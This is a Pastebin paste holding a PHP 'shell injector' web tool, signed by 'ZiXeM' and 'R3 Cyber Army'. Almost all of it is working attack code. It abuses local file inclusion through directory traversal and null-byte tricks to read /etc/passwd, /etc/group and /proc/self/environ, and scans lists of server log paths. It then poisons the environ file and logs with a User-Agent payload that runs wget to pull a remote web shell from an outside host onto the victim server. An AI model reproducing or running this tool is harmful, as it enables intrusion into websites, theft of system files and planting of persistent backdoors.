Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /* ~~~~~~~~~~~~~~~~~~~
- Coded by ./Cat./k398rm
- ~~~~~~~~~~~~~~~~~~~~*/
- error_reporting(0); ?>
- <html>
- <head>
- <style type='text/css'>
- body {
- background-color:#202020;
- color:White;
- }
- input {
- background-color:White;
- color:Black;
- border-color: Black;
- border-width: 2px;
- border-style: solid;
- }
- .copyright {
- background: -moz-linear-gradient(center bottom , #FFFFFF 0%, #000000 100%) repeat scroll 0 0 padding-box transparent;
- border: 1px solid #28343F;
- border-radius: 3px 3px 3px 3px;
- box-shadow: 0 1px 2px #647384 inset;
- }
- #down {
- color: Blue;
- font: italic 1em/30px Arial,Helvetica,sans-serif;
- height: 20px;
- margin: 30px auto 0;
- min-width: 300px;
- padding: 10px 0;
- text-align: center;
- width: 30%;
- }
- iframe {
- width: 1px;
- height: 1px;
- }
- .none {
- display:none;
- }
- textarea {
- background-color:Black;
- Color:Cyan;
- }
- .btn {
- color:Lime;
- background-color:Black;
- border-style: solid;
- border-color:White;
- border-width:2px;
- }
- </style>
- <title>APC-By Zixem.</title>
- </head>
- <body>
- <center><img src='http://i.imm.io/TB94.jpeg' width='250' height='250' /></a><font color='#202020'>_____</font><br /><u><b><i>Shell injector.</i></b></u></center><p />
- <center>
- <form action='p0ison3r_zixem.php' name='form' method='get'>
- <code>
- <u>Ex. for vuln good links:</u><br/>
- <font color='Green'><b>http://www.site.com/index.php?page=</b></font> <br/>
- <u>Ex. for vuln bad links:</u><br/>
- <font color='Red'>http://www.site.com/index.php?page=<b><del>about.php</b></del></font><br /><p />
- </code>
- Vuln link: . <td><input type='text' name='url' size='50' value='http://www.site.com/index.php?page=' />
- <br/>
- Shell link: <td><input type='text' name='shell' size='50' value='http://creyzistyle.tk/digi7al.txt' />
- <br />
- <input class='btn' type='submit' name='Go' value='Start.' />
- <p />
- ___________LOG____________
- <p />
- <center></form>
- <textarea cols='100' rows='20' readonly='readonly'>
- <?php
- // Varabiles PART
- /*
- Group file regex:
- root:x:0:root
- bin:x:1:root,bin,daemon
- daemon:x:2:root,bin,daemon
- sys:x:3:root,bin,adm
- adm:x:4:root,adm,daemon
- tty:x:5:
- */
- $url=$_GET['url'];
- $x404=file_get_contents($url."ZiXeM.php");
- //$passwd= array("../../../../../../../../../../../../../etc/passwd","/etc/passwd","../etc/passwd","/etc/group","../../../../../../../../../../../etc/group","../../../../../../../../proc/self/environ","/proc/self/environ","../proc/self/environ");
- $passwd= array('../../../../../../../../../../../../../etc/passwd','/etc/passwd','../etc/passwd','/etc/group','../../../../../../../../../../../etc/group','../../../../../../../../proc/self/environ','/proc/self/environ','../proc/self/environ');
- $logfiles= array("../apache/logs/error.log","../apache/logs/access.log","../../apache/logs/error.log","../../apache/logs/access.log","../../../apache/logs/error.log","../../../apache/logs/access.log","../../../../../../../etc/httpd/logs/acces_log","../../../../../../../etc/httpd/logs/acces.log","../../../../../../../etc/httpd/logs/error_log","../../../../../../../etc/httpd/logs/error.log","../../../../../../../var/www/logs/access_log","../../../../../../../var/www/logs/access.log","../../../../../../../usr/local/apache/logs/access_log","../../../../../../../usr/local/apache/logs/access.log","../../../../../../../var/log/apache/access_log","../../../../../../../var/log/apache2/access_log","../../../../../../../var/log/apache/access.log","../../../../../../../var/log/apache2/access.log","../../../../../../../var/log/access_log","../../../../../../../var/log/access.log","../../../../../../../var/www/logs/error_log","../../../../../../../var/www/logs/error.log","../../../../../../../usr/local/apache/logs/error_log","../../../../../../../usr/local/apache/logs/error.log","../../../../../../../var/log/apache/error_log","../../../../../../../var/log/apache2/error_log","../../../../../../../var/log/apache/error.log","../../../../../../../var/log/apache2/error.log","../../../../../../../var/log/error_log","../../../../../../../var/log/error.log","../../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf","/etc/httpd/conf/httpd.conf","/logs/access.log","/logs/error.log");
- $founded= array('ZiXeM');
- if(isset($_GET['Go']) && $_GET['Go']=='Start.') {
- if(!preg_match("/^http:\/\//",$_GET['url'])) {
- die("Enter url must be with http:// !\n");
- }
- if(!preg_match("/^http:\/\//",$_GET['shell'])) {
- die("Enter shell url with http:// !\n");
- }
- echo "Starting...\nTarget: {$_GET['url']}\n====================\n\n";
- foreach($passwd as $checker) {
- $x=file_get_contents($url.$checker."%00");
- $x1=file_get_contents($url.$checker."%0A");
- $x2=file_get_contents($url.$checker);
- if(preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x1) || preg_match("/bin:x:1:1:bin:\/bin:\/sbin\/nologin/",$x2)) {
- $groupfile=TRUE;
- }
- if(preg_match("/DOCUMENT_ROOT=\//",$x) || preg_match("/DOCUMENT_ROOT=\//",$x1) || preg_match("/DOCUMENT_ROOT=\//",$x2)) {
- $environfile=TRUE;
- }
- if(preg_match("/bin:x:1:root,bin,daemon/",$x) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x) || preg_match("/bin:x:1:root,bin,daemon/",$x1) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x1) || preg_match("/bin:x:1:root,bin,daemon/",$x2) || preg_match("/root:x:0:0:root:\/root:\/bin\/bash/",$x2)) {
- $passwdfile=TRUE;
- }
- }
- if($groupfile==TRUE) { echo "[/etc/group] -> \tAvailable.\n"; } else { echo "[/etc/group] -> \tUnavailable.\n"; }
- if($passwdfile==TRUE) { echo "[/etc/passwd] -> \tAvailable.\n";} else { echo "[/etc/passwd] -> \tUnavailable.\n"; }
- if($environfile==TRUE) { echo "[/proc/self/environ] -> Available.\n";} else { echo "[/proc/self/environ] -> Unavailable.\n"; }
- /*~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PART OF SCANNING THE LOG FILES ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */
- // Word for Regex: HTTP/1.1
- foreach($logfiles as $logfile) {
- $y=file_get_contents($url.$logfile);
- if(preg_match("/HTTP\/1.1/i",$y)) {
- echo "[Log file]: ->\t".$url.$logfile."%00\n";
- $founded[]=$url.$logfile."%00";
- }
- else { $log_found=FALSE; }
- }
- if($log_found==FALSE && $environfile==TRUE) {
- echo "[Log file]: ->\tNot found.\n\nTrying /proc/self/environ method....\n";
- $inject_num_2 = curl_init();
- curl_setopt($inject_num_2, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ");
- curl_setopt($inject_num_2, CURLOPT_HEADER, 1);
- curl_setopt($inject_num_2, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
- echo "</textarea>";
- echo "<div class='none'>";
- $final_exec=curl_exec($inject_num_2);
- echo "</div>";
- curl_close($inject_num_2);
- $inject_num_3 = curl_init();
- curl_setopt($inject_num_3, CURLOPT_URL, $url."../../../../../../../../../proc/self/environ%00");
- curl_setopt($inject_num_3, CURLOPT_HEADER, 1);
- curl_setopt($inject_num_3, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
- echo "<div class='none'>";
- $final_exec3=curl_exec($inject_num_3);
- echo "</div>";
- $inject_num_4 = curl_init();
- curl_setopt($inject_num_4, CURLOPT_URL, $url."/proc/self/environ%00");
- curl_setopt($inject_num_4, CURLOPT_HEADER, 1);
- curl_setopt($inject_num_4, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($inject_num_4, CURLOPT_USERAGENT, "<?php shell_exec('wget {$_GET['shell'] } -O 404ZIX.php'); ?>");
- echo "<div class='none'>";
- $final_exec4=curl_exec($inject_num_4);
- echo "</div>";
- echo "<br />";
- //echo "<br /><textarea cols='50' rows='5'>";
- // close cURL resource, and free up system resources
- curl_close($inject_num_3);
- if($inject_num_2==TRUE || $inject_num_3==TRUE || $inject_num_4==TRUE) {
- die("<pre>[<font color='Lime'><b>+</b></font>] -> Chance the shell injected: [<font color='Red'><b>50%</font></b>]...the shell named 404ZIX.php\n<b>{$url}<font color='Red'>404ZIX.php</b></font>\n==============\nThanks for using ZiXeM's shell injector.</pre>");
- }
- else { die("</div>Failed...sorry :S <div id='none'>"); flush(); ob_flush(); }
- }
- if($logfile==TRUE) {
- //echo file_get_contents("{$url}/proc/self/environ");
- ?>
- <?php
- //$_SERVER['HTTP_USER_AGENT']="<h1>HeyThere</h1>";
- //echo "<iframe src='{$url}/proc/self/environ'></iframe>";
- //echo "</textarea>";
- file_get_contents($url."<?php shell_exec('wget {$_GET['shell']} -O 404ZIX.php'); ?>");
- file_get_contents($founded[1]);
- echo "<iframe src='{$founded[1]}'></iframe>";
- echo "<textarea class='none'>";
- }
- else { echo "/*~~~~~~~~~~~~*/\n[-] -> Sorry...shell uploading failed.\n================\nZiXeM.\n</textarea>"; }
- }
- ?>
- </textarea>
- <div id='down' class='copyright'>Copyright 2013 R3 Cyber Army<font color='Red'><b></b></font></b>
- </center>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement